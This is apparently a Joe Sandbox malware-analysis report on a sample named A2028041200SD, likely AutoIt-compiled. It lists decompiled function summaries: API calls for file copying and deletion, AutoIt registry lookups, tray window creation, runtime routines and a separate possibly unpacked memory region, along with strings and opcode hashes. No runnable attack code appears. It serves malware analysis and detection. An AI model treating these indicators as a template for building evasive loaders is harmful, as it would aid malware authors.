                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                        • API String ID: 2641332412-570651680
                                                                        • Opcode ID: 93999083fc100cf9e5392d3d2474603169759e0ea4564588986fc1cf559f926e
                                                                        • Instruction ID: 3e5afed3cf1556cccf73d1e86b835fae8503c0182b4d93b4c08a502d371f5486
                                                                        • Opcode Fuzzy Hash: 93999083fc100cf9e5392d3d2474603169759e0ea4564588986fc1cf559f926e
                                                                        • Instruction Fuzzy Hash: D262B070508348DFDB24DF24C895BAA77E4FF84314F14496DFA8ADB2A2DB749848CB52
                                                                        APIs
                                                                        • ___createFile.LIBCMT ref: 00925EC3
                                                                        • ___createFile.LIBCMT ref: 00925F04
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00925F2D
                                                                        • __dosmaperr.LIBCMT ref: 00925F34
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00925F47
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00925F6A
                                                                        • __dosmaperr.LIBCMT ref: 00925F73
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00925F7C
                                                                        • __set_osfhnd.LIBCMT ref: 00925FAC
                                                                        • __lseeki64_nolock.LIBCMT ref: 00926016
                                                                        • __close_nolock.LIBCMT ref: 0092603C
                                                                        • __chsize_nolock.LIBCMT ref: 0092606C
                                                                        • __lseeki64_nolock.LIBCMT ref: 0092607E
                                                                        • __lseeki64_nolock.LIBCMT ref: 00926176
                                                                        • __lseeki64_nolock.LIBCMT ref: 0092618B
                                                                        • __close_nolock.LIBCMT ref: 009261EB
                                                                          • Part of subcall function 0091EA9C: CloseHandle.KERNELBASE(00000000,0099EEF4,00000000,?,00926041,0099EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0091EAEC
                                                                          • Part of subcall function 0091EA9C: GetLastError.KERNEL32(?,00926041,0099EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0091EAF6
                                                                          • Part of subcall function 0091EA9C: __free_osfhnd.LIBCMT ref: 0091EB03
                                                                          • Part of subcall function 0091EA9C: __dosmaperr.LIBCMT ref: 0091EB25
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • __lseeki64_nolock.LIBCMT ref: 0092620D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00926342
                                                                        • ___createFile.LIBCMT ref: 00926361
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0092636E
                                                                        • __dosmaperr.LIBCMT ref: 00926375
                                                                        • __free_osfhnd.LIBCMT ref: 00926395
                                                                        • __invoke_watson.LIBCMT ref: 009263C3
                                                                        • __wsopen_helper.LIBCMT ref: 009263DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                        • String ID: @
                                                                        • API String ID: 3896587723-2766056989
                                                                        • Opcode ID: 4545b023ffcab1d1e5cf612c6df76ca8b0a82778968d70d6ce622df727734832
                                                                        • Instruction ID: ec8af3cc19609cd71a0ccd41f5c5c140fb4d991a40d0cecd4eda6be35bf1caad
                                                                        • Opcode Fuzzy Hash: 4545b023ffcab1d1e5cf612c6df76ca8b0a82778968d70d6ce622df727734832
                                                                        • Instruction Fuzzy Hash: C9226871A0462A9BEF259F68EC45BFD7B35EF40324F254228E821DB2D9C3398D90D791

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _wcscpy.LIBCMT ref: 0093FA96
                                                                        • _wcschr.LIBCMT ref: 0093FAA4
                                                                        • _wcscpy.LIBCMT ref: 0093FABB
                                                                        • _wcscat.LIBCMT ref: 0093FACA
                                                                        • _wcscat.LIBCMT ref: 0093FAE8
                                                                        • _wcscpy.LIBCMT ref: 0093FB09
                                                                        • __wsplitpath.LIBCMT ref: 0093FBE6
                                                                        • _wcscpy.LIBCMT ref: 0093FC0B
                                                                        • _wcscpy.LIBCMT ref: 0093FC1D
                                                                        • _wcscpy.LIBCMT ref: 0093FC32
                                                                        • _wcscat.LIBCMT ref: 0093FC47
                                                                        • _wcscat.LIBCMT ref: 0093FC59
                                                                        • _wcscat.LIBCMT ref: 0093FC6E
                                                                          • Part of subcall function 0093BFA4: _wcscmp.LIBCMT ref: 0093C03E
                                                                          • Part of subcall function 0093BFA4: __wsplitpath.LIBCMT ref: 0093C083
                                                                          • Part of subcall function 0093BFA4: _wcscpy.LIBCMT ref: 0093C096
                                                                          • Part of subcall function 0093BFA4: _wcscat.LIBCMT ref: 0093C0A9
                                                                          • Part of subcall function 0093BFA4: __wsplitpath.LIBCMT ref: 0093C0CE
                                                                          • Part of subcall function 0093BFA4: _wcscat.LIBCMT ref: 0093C0E4
                                                                          • Part of subcall function 0093BFA4: _wcscat.LIBCMT ref: 0093C0F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 2955681530-2806939583
                                                                        • Opcode ID: 24a489255a94fdab10914b2b31c22f1a5a479fb19581174de945563c6732027a
                                                                        • Instruction ID: f981615e3409cb63b8000dab432152ff91006ace72a5ac7f8c23910b1423cafe
                                                                        • Opcode Fuzzy Hash: 24a489255a94fdab10914b2b31c22f1a5a479fb19581174de945563c6732027a
                                                                        • Instruction Fuzzy Hash: 96919471604709AFDB20EB64C851F9BB3E8FF94310F048869F99997291DB71E984CF92

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0093BDB4: __time64.LIBCMT ref: 0093BDBE
                                                                          • Part of subcall function 008F4517: _fseek.LIBCMT ref: 008F452F
                                                                        • __wsplitpath.LIBCMT ref: 0093C083
                                                                          • Part of subcall function 00911DFC: __wsplitpath_helper.LIBCMT ref: 00911E3C
                                                                        • _wcscpy.LIBCMT ref: 0093C096
                                                                        • _wcscat.LIBCMT ref: 0093C0A9
                                                                        • __wsplitpath.LIBCMT ref: 0093C0CE
                                                                        • _wcscat.LIBCMT ref: 0093C0E4
                                                                        • _wcscat.LIBCMT ref: 0093C0F7
                                                                        • _wcscmp.LIBCMT ref: 0093C03E
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C65D
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C670
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0093C2A1
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093C338
                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093C34E
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0093C35F
                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0093C371
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                        • String ID: p1Mw`KNw
                                                                        • API String ID: 2378138488-3626030660
                                                                        • Opcode ID: 3984fd1709d3ccfe35a8877281de3c60b013978416d045a86eeb9ccc0180990a
                                                                        • Instruction ID: 68e40ac9bcf3733a995a7d67e5b771e758898b5635d30d72724e910dcc184f36
                                                                        • Opcode Fuzzy Hash: 3984fd1709d3ccfe35a8877281de3c60b013978416d045a86eeb9ccc0180990a
                                                                        • Instruction Fuzzy Hash: 64C1F9B1A0021DAADF11DFA5CC81EEEB7BDEF99314F0040A6F609F6151DB709A848F65

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 008F3F86
                                                                        • RegisterClassExW.USER32(00000030), ref: 008F3FB0
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F3FC1
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 008F3FDE
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F3FEE
                                                                        • LoadIconW.USER32(000000A9), ref: 008F4004
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F4013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                         • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: f6b6961e84133a13a384da1d53104762129d7f00ad1f03d994532ec2adc3f7b9
                                                                        • Instruction ID: 503fe2a166065306316eed7e5b926adae85df3245adc39a76e8e2537bb1dbd62
                                                                        • Opcode Fuzzy Hash: f6b6961e84133a13a384da1d53104762129d7f00ad1f03d994532ec2adc3f7b9
                                                                        • Instruction Fuzzy Hash: BD21F7B5D29308EFDB00DFA4ED89BCDBBB4FB08710F10421AF515A62A0D7B10584AF91

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 008F37B3
                                                                        • KillTimer.USER32(?,00000001), ref: 008F37DD
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F3800
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F380B
                                                                        • CreatePopupMenu.USER32 ref: 008F381F
                                                                        • PostQuitMessage.USER32(00000000), ref: 008F382E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 206e4b51e5a60583d9d4917d491d1fbc4692c05655569b9888c06a25accc651a
                                                                        • Instruction ID: d58b6134459b525f84eb6e0867d37425876fb5bd433ed5acc928458f0942c619
                                                                        • Opcode Fuzzy Hash: 206e4b51e5a60583d9d4917d491d1fbc4692c05655569b9888c06a25accc651a
                                                                        • Instruction Fuzzy Hash: B2412BF112824DABDF247B38DD5DB7A36A9FB40751F540235FB01D21E1CB609D50A761

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 008F3E79
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 008F3E88
                                                                        • LoadIconW.USER32(00000063), ref: 008F3E9E
                                                                        • LoadIconW.USER32(000000A4), ref: 008F3EB0
                                                                        • LoadIconW.USER32(000000A2), ref: 008F3EC2
                                                                          • Part of subcall function 008F4024: LoadImageW.USER32(008F0000,00000063,00000001,00000010,00000010,00000000), ref: 008F4048
                                                                        • RegisterClassExW.USER32(?), ref: 008F3F30
                                                                          • Part of subcall function 008F3F53: GetSysColorBrush.USER32(0000000F), ref: 008F3F86
                                                                          • Part of subcall function 008F3F53: RegisterClassExW.USER32(00000030), ref: 008F3FB0
                                                                          • Part of subcall function 008F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F3FC1
                                                                          • Part of subcall function 008F3F53: InitCommonControlsEx.COMCTL32(?), ref: 008F3FDE
                                                                          • Part of subcall function 008F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F3FEE
                                                                          • Part of subcall function 008F3F53: LoadIconW.USER32(000000A9), ref: 008F4004
                                                                          • Part of subcall function 008F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F4013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: a8889c8696e7f282f827b2b793a0dc8ac1c58c3018e876ed4de9d93016c58949
                                                                        • Instruction ID: 7b77478e66c0391fc67cc7cacf7b1a69abae59d4e30ce1010c6a74001f1a45ac
                                                                        • Opcode Fuzzy Hash: a8889c8696e7f282f827b2b793a0dc8ac1c58c3018e876ed4de9d93016c58949
                                                                        • Instruction Fuzzy Hash: 832165B1D1C304ABCB04DFA9ED55A9ABFF5FB48320F50421AE204A32A0D77546909F91

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __lock.LIBCMT ref: 0091ACC1
                                                                          • Part of subcall function 00917CF4: __mtinitlocknum.LIBCMT ref: 00917D06
                                                                          • Part of subcall function 00917CF4: EnterCriticalSection.KERNEL32(00000000,?,00917ADD,0000000D), ref: 00917D1F
                                                                        • __calloc_crt.LIBCMT ref: 0091ACD2
                                                                          • Part of subcall function 00916986: __calloc_impl.LIBCMT ref: 00916995
                                                                          • Part of subcall function 00916986: Sleep.KERNEL32(00000000,000003BC,0090F507,?,0000000E), ref: 009169AC
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0091ACED
                                                                        • GetStartupInfoW.KERNEL32(?,009A6E28,00000064,00915E91,009A6C70,00000014), ref: 0091AD46
                                                                        • __calloc_crt.LIBCMT ref: 0091AD91
                                                                        • GetFileType.KERNEL32(00000001), ref: 0091ADD8
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0091AE11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1426640281-0
                                                                        • Opcode ID: ece0df64bdfad87c391d58ac572413e05bf270759ebd31d0f0cc3f4a00ce7fd2
                                                                        • Instruction ID: 95edff35879fcfda58a86f4b6ce93381e1fd92643ef7952eca4bb56bece55c27
                                                                        • Opcode Fuzzy Hash: ece0df64bdfad87c391d58ac572413e05bf270759ebd31d0f0cc3f4a00ce7fd2
                                                                        • Instruction Fuzzy Hash: AD81D171A062498FDB24CF68C8406EDBBF4AF45334B24425DD4AAAB3D1C7349C83DB56

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01276D39
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01276F5F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                        • Instruction ID: 2ba535d205d1417c7bbf2f91f648a5873db10703772e570f436857d0a52bff6b
                                                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                        • Instruction Fuzzy Hash: 9EA10970E10209EBEB14CFA4C895FEEBBB5BF48304F208559E605BB280D7759A81CF65

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008F4A1D
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009641DB
                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0096421A
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00964249
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue$CloseOpen
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                        • API String ID: 1586453840-614718249
                                                                        • Opcode ID: f99c32142f4d31457f400bdf49ed19d5c653e596a07093f2b9e7a99e4db37962
                                                                        • Instruction ID: b2f7d26e963a70962ad2bc33ac4f25c21cb043a362e42ade678e375552716f0d
                                                                        • Opcode Fuzzy Hash: f99c32142f4d31457f400bdf49ed19d5c653e596a07093f2b9e7a99e4db37962
                                                                        • Instruction Fuzzy Hash: AE114F7161110CBFEB04ABA8DD96DBF7BBCEF15344F101059F506E6191EA70AE41DB50

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008F36E6
                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008F3707
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F371B
                                                                        • ShowWindow.USER32(00000000,?,?,?,?,008F3AA3,?), ref: 008F3724
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateShow
                                                                        • String ID: AutoIt v3$edit
                                                                        • API String ID: 1584632944-3779509399
                                                                        • Opcode ID: 01aac1297179458aad71c2f44ba62b956b2a00c9566b8a5c182f642370542ea9
                                                                        • Instruction ID: 78e8bc83ea63e8b0a86c6214a5656f8f98def6ee2a5dec9f876e7a13562bdc3e
                                                                        • Opcode Fuzzy Hash: 01aac1297179458aad71c2f44ba62b956b2a00c9566b8a5c182f642370542ea9
                                                                        • Instruction Fuzzy Hash: 41F03A729692D07AEB306757AD18E673E7DD7C6F30F60011AFA08A22A0C16108C1EAB0

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 01276918: Sleep.KERNELBASE(000001F4), ref: 01276929
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01276B5C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileSleep
                                                                        • String ID: MH4C252G0QQ8BKFT9P5BF05
                                                                        • API String ID: 2694422964-2467997446
                                                                        • Opcode ID: 2dc023986499023ddc4873005bf48a89b09acf4d787493ae8008d3fd3e6d6c03
                                                                        • Instruction ID: b0797ecf46acc5c630010c61879c10d4afc03bebb366e6a5da2e1f0aa2a7a2f0
                                                                        • Opcode Fuzzy Hash: 2dc023986499023ddc4873005bf48a89b09acf4d787493ae8008d3fd3e6d6c03
                                                                        • Instruction Fuzzy Hash: 18518470D14289DAEF12DBA4C858BEFBB78AF15304F044199E248BB2C1D7B91B45CBA5
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008F522F
                                                                        • _wcscpy.LIBCMT ref: 008F5283
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5293
                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00963CB0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                        • String ID: Line:
                                                                        • API String ID: 1053898822-1585850449
                                                                        • Opcode ID: 65e4ae20eee340c76251d79366770ba40940d831f7b7213cbf756d336be5d0ed
                                                                        • Instruction ID: 45b05a8ce14d98a3bf81bd435b283c0eb99e676ced664822d9bce16d11baf978
                                                                        • Opcode Fuzzy Hash: 65e4ae20eee340c76251d79366770ba40940d831f7b7213cbf756d336be5d0ed
                                                                        • Instruction Fuzzy Hash: B1318F715087486BD320EB64DC42BEA77D8FB84314F50461AF799D2091EB70A6888B97
                                                                        APIs
                                                                          • Part of subcall function 008F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008F39FE,?,00000001), ref: 008F41DB
                                                                        • _free.LIBCMT ref: 009636B7
                                                                        • _free.LIBCMT ref: 009636FE
                                                                          • Part of subcall function 008FC833: __wsplitpath.LIBCMT ref: 008FC93E
                                                                          • Part of subcall function 008FC833: _wcscpy.LIBCMT ref: 008FC953
                                                                          • Part of subcall function 008FC833: _wcscat.LIBCMT ref: 008FC968
                                                                          • Part of subcall function 008FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008FC978
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
